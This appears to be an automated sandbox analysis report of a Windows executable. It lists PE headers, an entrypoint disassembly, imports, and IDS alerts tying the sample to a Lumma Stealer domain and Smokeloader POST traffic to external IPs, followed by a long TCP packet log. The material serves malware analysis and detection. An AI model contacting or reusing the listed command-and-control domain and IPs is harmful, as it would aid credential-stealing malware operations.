                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x65652355 [Mon Nov 27 23:16:37 2023 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:1
                                                                              File Version Major:5
                                                                              File Version Minor:1
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:1
                                                                              Import Hash:8744ff8cb8213e20c3a4b3f29831f2ef

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              call 00007F74C0709867h
                                                                              jmp 00007F74C0704C64h
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              mov eax, dword ptr [ebp+08h]
                                                                              push esi
                                                                              mov esi, ecx
                                                                              and dword ptr [esi+04h], 00000000h
                                                                              mov dword ptr [esi], 00411260h
                                                                              mov byte ptr [esi+08h], 00000000h
                                                                              push dword ptr [eax]
                                                                              call 00007F74C0704E8Dh
                                                                              mov eax, esi
                                                                              pop esi
                                                                              pop ebp
                                                                              retn 0004h
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              mov eax, dword ptr [ebp+08h]
                                                                              mov dword ptr [ecx], 00411260h
                                                                              mov eax, dword ptr [eax]
                                                                              mov dword ptr [ecx+04h], eax
                                                                              mov eax, ecx
                                                                              mov byte ptr [ecx+08h], 00000000h
                                                                              pop ebp
                                                                              retn 0008h
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push esi
                                                                              push dword ptr [ebp+08h]
                                                                              mov esi, ecx
                                                                              and dword ptr [esi+04h], 00000000h
                                                                              mov dword ptr [esi], 00411260h
                                                                              mov byte ptr [esi+08h], 00000000h
                                                                              call 00007F74C0704DF7h
                                                                              mov eax, esi
                                                                              pop esi
                                                                              pop ebp
                                                                              retn 0004h
                                                                              mov dword ptr [ecx], 00411260h
                                                                              jmp 00007F74C0704E7Bh
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push esi
                                                                              push edi
                                                                              mov edi, dword ptr [ebp+08h]
                                                                              mov esi, ecx
                                                                              cmp esi, edi
                                                                              je 00007F74C0704DFFh
                                                                              call 00007F74C0704E68h
                                                                              cmp byte ptr [edi+08h], 00000000h
                                                                              je 00007F74C0704DEEh
                                                                              push dword ptr [edi+04h]
                                                                              mov ecx, esi
                                                                              call 00007F74C0704E1Ah
                                                                              jmp 00007F74C0704DE8h
                                                                              mov eax, dword ptr [edi+04h]
                                                                              mov dword ptr [esi+04h], eax
                                                                              pop edi
                                                                              mov eax, esi
                                                                              pop esi
                                                                              pop ebp
                                                                              retn 0004h
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push esi
                                                                              mov esi, ecx
                                                                              mov dword ptr [esi], 00411260h
                                                                              call 00007F74C0704E37h
                                                                              test byte ptr [ebp+08h], 00000001h
                                                                              je 00007F74C0704DE9h
                                                                              push esi
                                                                              call 00007F74C070308Bh

                                                                              Rich Headers

                                                                              Programming Language:
                                                                              • [ASM] VS2013 build 21005
                                                                              • [ C ] VS2013 build 21005
                                                                              • [C++] VS2013 build 21005
                                                                              • [IMP] VS2008 SP1 build 30729
                                                                              • [C++] VS2013 UPD5 build 40629
                                                                              • [RES] VS2013 build 21005
                                                                              • [LNK] VS2013 UPD5 build 40629

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x169f40x50.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x288c0000xd180.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x16a440x1c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x15f500x40.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x100000x16c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000xe3310xe400d36f1f8a6894ef66718fdaf189ebe71dFalse0.6024362664473685data6.724208372728653IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x100000x72380x7400ebac625979f148341b89f8cd221d5b2bFalse0.38092672413793105data4.835000748822607IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0x180000x28736200x17c00d94559dd843534ab3d29ed0c388d7facunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc0x288c0000xd1800xd200c3f3bcd725688b7f6ebcaf490d54b8f1False0.34536830357142856data4.5663764717504IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              AFX_DIALOG_LAYOUT0x28925a00x2data5.0
                                                                              RT_CURSOR0x28925a80x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
                                                                              RT_CURSOR0x28928d80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
                                                                              RT_CURSOR0x2892a300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                                                              RT_CURSOR0x28938d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                                                              RT_CURSOR0x28941800x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                                                              RT_CURSOR0x28947180x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                                                                              RT_CURSOR0x28948480xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                                                                              RT_CURSOR0x28949200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                                                                              RT_CURSOR0x28957c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                                                                              RT_CURSOR0x28960700x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                                                                              RT_CURSOR0x28966080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                                                              RT_CURSOR0x28974b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                                                              RT_CURSOR0x2897d580x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                                                              RT_ICON0x288c7000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0JapaneseJapan0.42883795309168443
                                                                              RT_ICON0x288d5a80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0JapaneseJapan0.5532490974729242
                                                                              RT_ICON0x288de500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0JapaneseJapan0.5858294930875576
                                                                              RT_ICON0x288e5180x568Device independent bitmap graphic, 16 x 32 x 8, image size 0JapaneseJapan0.6047687861271677
                                                                              RT_ICON0x288ea800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0JapaneseJapan0.445746887966805
                                                                              RT_ICON0x28910280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0JapaneseJapan0.4915572232645403
                                                                              RT_ICON0x28920d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0JapaneseJapan0.5230496453900709
                                                                              RT_DIALOG0x28985880x5adata0.8666666666666667
                                                                              RT_STRING0x28985e80x42cdataJapaneseJapan0.4597378277153558
                                                                              RT_STRING0x2898a180x58cdataJapaneseJapan0.44577464788732396
                                                                              RT_STRING0x2898fa80x1d2dataJapaneseJapan0.5321888412017167
                                                                              RT_GROUP_CURSOR0x2892a080x22data1.0294117647058822
                                                                              RT_GROUP_CURSOR0x28946e80x30data0.9375
                                                                              RT_GROUP_CURSOR0x28948f80x22data1.0588235294117647
                                                                              RT_GROUP_CURSOR0x28965d80x30data0.9375
                                                                              RT_GROUP_CURSOR0x28982c00x30data0.9375
                                                                              RT_GROUP_ICON0x28925380x68dataJapaneseJapan0.6826923076923077
                                                                              RT_VERSION0x28982f00x294OpenPGP Secret Key0.5045454545454545

                                                                              Imports

                                                                              DLLImport
                                                                              KERNEL32.dllGetProcAddress, GlobalAlloc, GetLastError, SetLastError, GetThreadContext, GetTickCount, CreateEventA, LoadLibraryA, LoadLibraryW, LoadLibraryExW, GetModuleFileNameW, GetSystemDirectoryA, GetTempPathA, CreateDirectoryW, SetFileAttributesW, GetVolumeInformationA, BuildCommDCBW, SetComputerNameExA, VerifyVersionInfoW, IsProcessInJob, SetVolumeMountPointW, GetLocaleInfoW, SetCalendarInfoW, GetNumberFormatW, GetStringTypeW, SetConsoleCursorInfo, AllocConsole, WriteConsoleW, AddConsoleAliasA, OutputDebugStringW, GetConsoleCP, FlushFileBuffers, IsBadStringPtrA, InterlockedExchange, EncodePointer, DecodePointer, ReadFile, RaiseException, RtlUnwind, GetCommandLineW, IsProcessorFeaturePresent, HeapAlloc, HeapFree, ExitProcess, GetModuleHandleExW, MultiByteToWideChar, WideCharToMultiByte, HeapSize, IsDebuggerPresent, EnterCriticalSection, LeaveCriticalSection, CloseHandle, SetFilePointerEx, GetConsoleMode, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetCurrentThreadId, GetProcessHeap, WriteFile, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, LCMapStringW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, HeapReAlloc, SetStdHandle, CreateFileW
                                                                              USER32.dllGetSysColorBrush, DdeFreeStringHandle
                                                                              GDI32.dllGetCharWidthW

                                                                              Possible Origin

                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              JapaneseJapan

                                                                              Network Behavior

                                                                              Snort IDS Alerts

                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                              05/26/24-10:22:33.956954UDP2052787ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop)5216353192.168.2.41.1.1.1
                                                                              05/26/24-10:25:58.715000TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5274680192.168.2.4185.18.245.58
                                                                              05/26/24-10:25:39.806023TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5274380192.168.2.4185.18.245.58
                                                                              05/26/24-10:22:25.599878TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973880192.168.2.4190.28.110.209
                                                                              05/26/24-10:24:23.638002TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5269480192.168.2.4190.28.110.209
                                                                              05/26/24-10:25:03.657070TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5273780192.168.2.4185.18.245.58
                                                                              05/26/24-10:22:30.290385TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974180192.168.2.4190.28.110.209
                                                                              05/26/24-10:24:41.911621TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5269780192.168.2.4190.28.110.209
                                                                              05/26/24-10:22:33.788541TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974480192.168.2.4190.28.110.209
                                                                              05/26/24-10:22:59.723663TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5265680192.168.2.4190.28.110.209
                                                                              05/26/24-10:24:47.097794TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5269880192.168.2.4190.28.110.209
                                                                              05/26/24-10:24:28.877506TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5269580192.168.2.4190.28.110.209
                                                                              05/26/24-10:25:22.040106TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5274080192.168.2.4185.18.245.58
                                                                              05/26/24-10:22:36.018013TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974880192.168.2.4190.28.110.209
                                                                              05/26/24-10:23:03.796266TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5265880192.168.2.4190.28.110.209
                                                                              05/26/24-10:24:58.756614TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5273680192.168.2.4185.18.245.58
                                                                              05/26/24-10:24:36.577364TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5269680192.168.2.4190.28.110.209
                                                                              05/26/24-10:22:58.584278TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5265580192.168.2.4190.28.110.209
                                                                              05/26/24-10:25:16.590426TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5273980192.168.2.4185.18.245.58
                                                                              05/26/24-10:22:23.170190TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973680192.168.2.4190.28.110.209
                                                                              05/26/24-10:25:52.705023TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5274580192.168.2.4185.18.245.58
                                                                              05/26/24-10:22:26.743766TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973980192.168.2.4190.28.110.209
                                                                              05/26/24-10:24:18.309650TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5269380192.168.2.4190.28.110.209
                                                                              05/26/24-10:25:34.563116TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5274280192.168.2.4185.18.245.58
                                                                              05/26/24-10:25:11.186455TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5273880192.168.2.4185.18.245.58
                                                                              05/26/24-10:22:28.089697TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974080192.168.2.4190.28.110.209
                                                                              05/26/24-10:25:29.338724TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5274180192.168.2.4185.18.245.58
                                                                              05/26/24-10:22:32.694240TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974380192.168.2.4190.28.110.209
                                                                              05/26/24-10:22:34.953458TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974680192.168.2.4190.28.110.209
                                                                              05/26/24-10:25:47.428708TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5274480192.168.2.4185.18.245.58
                                                                              05/26/24-10:22:24.295939TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973780192.168.2.4190.28.110.209

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              May 26, 2024 10:22:23.164366961 CEST4973680192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:23.169755936 CEST8049736190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:23.170099974 CEST4973680192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:23.170190096 CEST4973680192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:23.170191050 CEST4973680192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:23.220510006 CEST8049736190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:23.267416000 CEST8049736190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:24.188839912 CEST8049736190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:24.193850994 CEST8049736190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:24.194217920 CEST4973680192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:24.194931030 CEST4973680192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:24.199970961 CEST4973780192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:24.244666100 CEST8049736190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:24.295547962 CEST8049737190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:24.295778036 CEST4973780192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:24.295938969 CEST4973780192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:24.295989990 CEST4973780192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:24.348835945 CEST8049737190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:24.399990082 CEST8049737190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:25.494138956 CEST8049737190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:25.499982119 CEST8049737190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:25.500186920 CEST4973780192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:25.509912968 CEST4973780192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:25.535984993 CEST4973880192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:25.553634882 CEST8049737190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:25.599446058 CEST8049738190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:25.599749088 CEST4973880192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:25.599878073 CEST4973880192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:25.599878073 CEST4973880192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:25.652796984 CEST8049738190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:25.699784040 CEST8049738190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:26.634282112 CEST8049738190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:26.639302969 CEST8049738190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:26.639612913 CEST4973880192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:26.639614105 CEST4973880192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:26.642950058 CEST4973980192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:26.692907095 CEST8049738190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:26.741385937 CEST8049739190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:26.741739035 CEST4973980192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:26.743766069 CEST4973980192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:26.743766069 CEST4973980192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:26.795140028 CEST8049739190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:26.847306967 CEST8049739190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:27.739417076 CEST8049739190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:27.744462013 CEST8049739190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:27.744786024 CEST4973980192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:27.744786978 CEST4973980192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:27.746850967 CEST4974080192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:27.796928883 CEST8049739190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:27.853523016 CEST8049740190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:27.853950024 CEST4974080192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:28.089696884 CEST4974080192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:28.089696884 CEST4974080192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:28.248748064 CEST8049740190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:28.295883894 CEST8049740190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:28.865943909 CEST8049740190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:28.870943069 CEST8049740190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:28.871294022 CEST4974080192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:30.204607010 CEST4974080192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:30.211294889 CEST8049740190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:30.285053968 CEST4974180192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:30.290096045 CEST8049741190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:30.290180922 CEST4974180192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:30.290385008 CEST4974180192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:30.290435076 CEST4974180192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:30.337660074 CEST8049741190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:30.383764029 CEST8049741190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:31.303996086 CEST8049741190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:31.304030895 CEST8049741190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:31.304092884 CEST4974180192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:31.304332972 CEST4974180192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:31.311275005 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:31.360666990 CEST8049741190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:31.411535025 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:31.411853075 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:31.411853075 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:31.465297937 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.124344110 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.126277924 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.126419067 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.131109953 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.135941029 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.135978937 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.136090040 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.145577908 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.145678043 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.148526907 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.148562908 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.148592949 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.148672104 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.154166937 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.154206038 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.154266119 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.159806967 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.159843922 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.159898996 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.197554111 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.197855949 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.199444056 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.201150894 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.201401949 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.203861952 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.203896046 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.204036951 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.206655979 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.209270000 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.209356070 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.211879015 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.214896917 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.214986086 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.215894938 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.217416048 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.217531919 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.219192982 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.221012115 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.221076965 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.222103119 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.223922968 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.224054098 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.225646019 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.227327108 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.227391958 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.228152990 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.231875896 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.231966019 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.232585907 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.233443022 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.233501911 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.235353947 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.238645077 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.238722086 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.239438057 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.243433952 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.243499994 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.308259010 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.308994055 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.309067965 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.310157061 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.311676025 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.311733961 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.313180923 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.314768076 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.314804077 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.314836025 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.318209887 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.318272114 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.318293095 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.320972919 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.321010113 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.321038961 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.321043015 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.321090937 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.323235989 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.324496984 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.324532032 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.324554920 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.326982975 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.327017069 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.327049971 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.329581022 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.329638958 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.329652071 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.332166910 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.332226038 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.332259893 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.332263947 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.332323074 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.334507942 CEST804974245.129.96.86192.168.2.4
